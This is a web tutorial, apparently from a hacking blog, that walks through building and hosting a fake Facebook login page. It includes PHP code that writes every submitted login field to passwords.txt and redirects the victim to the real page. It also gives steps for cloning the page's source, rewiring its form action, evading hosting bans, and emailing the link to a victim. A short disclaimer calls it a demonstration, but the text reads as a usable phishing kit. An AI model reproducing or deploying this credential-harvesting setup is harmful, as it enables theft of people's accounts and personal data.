How Phisher Works? – How to create Fake Facebook login page?
Disclaimer! :
This tutorial is just for demonstration purpose and to make you
conscious about the risk. We do not encourage you in any manner to try
it on others.
Phishing is a type of deception designed to steal
your valuable personal data such as login details, credit card numbers,
account data, or other information. below we have put-up basic phisher
mechanism that a hacker uses to make fake facebook login pages.
you know HTML & PhP, you will find it very easy. lets See how
simple it is to construct and set up a fake login page and steal the
Phisher Demonstration
Here’s what you will need:
1) A web hosting account or LocalHost
are hundreds of websites available that offer free web hosting account,
normally 100mb free with a Subdomain. Create a free web hosting account
with Subdomain on any of them. The Problem with free hosting is that,
as soon as they come to know that you have hosted phisher, they will Ban
you. For this reason its better to try this on LocalHost. Just google
“How to host website on local host”, you will get tons of tutorials.
2) A fake login page
create a fake facebook login page, just visit the login page, Right
Click on that page and click on ‘view source’ or view ‘page source’.
After this a new window will open with the source code. just select all
the code using ctrl+a and copy it with ctrl+c. open notepad and paste
this code in it. and save it with extension .html on the desktop.
for eg:- facebook-login.html
3) A php code that writes data on to a text file
Just copy the below php code in red and paste it in a notepad. after this save it as .php file on the desktop.
for eg:- code.php
header (‘Location: original login page’);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
fwrite($handle, “\r\n”);
4) A text file to save hacked facebook passwords
Just create an empty text file, name it as password.txt and save it on the desktop.
note- if you don’t create a text file, the ‘fopen’ command in code.php will automatically create a new text file
Creating phisher
Now we have the 3 required files facebook-login.html, code.php, password.txt on the desktop.
The next task is to link(connect) the 3 files. such that we must link
them in the order facebook-login.html >> code.php >>
i.e. facebook-login.html must be able to
communicate with code.php and further code.php must be able to
communicate with passwords.txt
Linking facebook-login.html and code.php
open facebook-login.html with text editor and search for ‘action’ field
( Press ctrl+F to search). Upon finding ‘action’ field you will see
something like this:
Replace everything in red with code.php, and save the file.
You just connected facebook-login.html to code.php
[ * ] There may be more than one action field. follow the same procedure of Replacing with Code.php
Linking code.php and passwords.txt
In the above given code, passwords.txt is already connected with code.php.
just open code.php with text editor and in the 2nd line replace
“original login page” with the facebook login page of your phisher and
save it.
In our example it is
just told code.php to open passwords.txt file when run and after the
victim enters the login details, redirect him to the original facebook
login page. Now that everything is ready, the next step is to host the
phisher that you just created on to a free web hosting server.
Hosting Phisher
#step1 login to your newly created free hosting account
#step2 click on ‘file manager’ to open file manager
#step3 now navigate to your subdomain directory. to do so just click on your subdomain in the files view area.
#step4 Now just create a new directory(folder) and name it according to phisher you have created.
#step5 navigate to the desired directory that you just created in ‘step3’
#step6 Upload all the 3 files, ie facebook-login.html,code.php,passwords.txt in this directory.
note- all the 3 files must be in the same directory.
#step7 copy the addresses of .html and .txt files
#step8 Now Send this phisher to your Virtual-victim. just send the link (.html file’s address) via email or any other medium.
#step9 Now
ask your virtual-victim to log-in on your fake facebook login page, the
username and password gets stored in a test file ie. passwords.txt and
now it can be opened any time to see the username and password.
That’s it! you are done. enjoy!